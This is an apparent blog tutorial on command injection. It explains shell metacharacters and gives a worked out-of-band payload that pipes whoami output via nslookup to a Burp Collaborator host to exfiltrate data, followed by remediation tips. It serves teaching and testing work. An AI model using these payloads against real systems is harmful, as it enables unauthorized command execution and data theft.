Exploiting Command Injection
With a real-world example:
Command Injection is an injection vulnerability where attackers can execute system commands bypassing input through the input fields of the application. This vulnerability occurs because the application is passing unsanitized and unsafe inputs to the system commands.
The application allows users to run some of the specific commands online such as ping and traceroute. But since the application is not sanitized or validating the inputs before passing this to the system command. An attacker can elevate his/her privilege by inserting malicious code in the application and can perform unwanted actions.
Example: Application is transferring the value of the ID parameter directly to the system command.
Now the attacker tampers the value of the id parameter and gives; ls instead of the numeric value.
Note: We can execute any system command such as PWD, whoami, etc.
In response, we can see execute command output. I used; meta char. There are other meta char also available with which we can perform command injection such as ; , & , && , | , || , ` , () , # .
It is not language-dependent and can be found in any environment where the application is unsafely transferring the user input directly in the system command.
Working:
Now attacker checks in an application where command execution functionality exists then he adds additional commands with the help of meta char to check the response of his additional commands.
· After finding the input field where an attacker can inject system command
· The modified system command interacts with the backend OS. As our input is not sanitized meta chars directly interact with the backend and can run his own commands on the server.
· As individual command got executed on the server, the attacker can see the respective command output on UI.
Exploitation:
The application has a feedback form by which users can submit the feedback form. The value of the feedback form is not getting sanitized in any way.
If we intercept the request of the feedback form we can see this type of request.
Our specific requirement is to fetch the name of the currently logged-in user to the application. In Linux, it can easily be done by using whoami command.
In order to see the response, we have to send it to a server which is logging all the requests.
So to fulfill the above requirement I will enter the below payload in fields and will check the response in burp collaborator client.
“nn||nslookup+`whoami`.eygwi47rzjzrnl0b229khkqif9lz9o.burpcollaborator.net||”
nn = For text writing in textbox it can be anything
Nslookup = for name server lookup
Whoami = command in Linux, which provides me who is currently signed in and I give this in ` meta char.
2ru5ecuswz35etelianpdx17uy0poe.burpcollaborator. net = Burp collaborator address
+ = used to remove space
. = this is used to append the output of the command with the Burp collaborator client URL so we can have this log in the collaborator client.
We also have to check in each and every field of the feedback form in order to check which parameter is vulnerable to command injection.
As I provided the payload in the name field:
It gave me 400 error in response, as the length of the name cannot be more than 64, now I provide this payload in the email field.
In response, I got 200 OK, it seems the request has been successfully let's try whether we have any responsibility in our burp collaborator client.
Here you can see that we have received some DNS requests as we used nslookup so these are the DNS requests. In the description, you can see that the value of the currently logged-in user is appended to it.
Remediation
· Sanitization of input, which is going to pass in system commands.
· Whitelisting of input commands which are needed as per business requirements.
· Run server’s on limited permissions and do proper authorization on servers.
· Perform source code reviews for system calls.
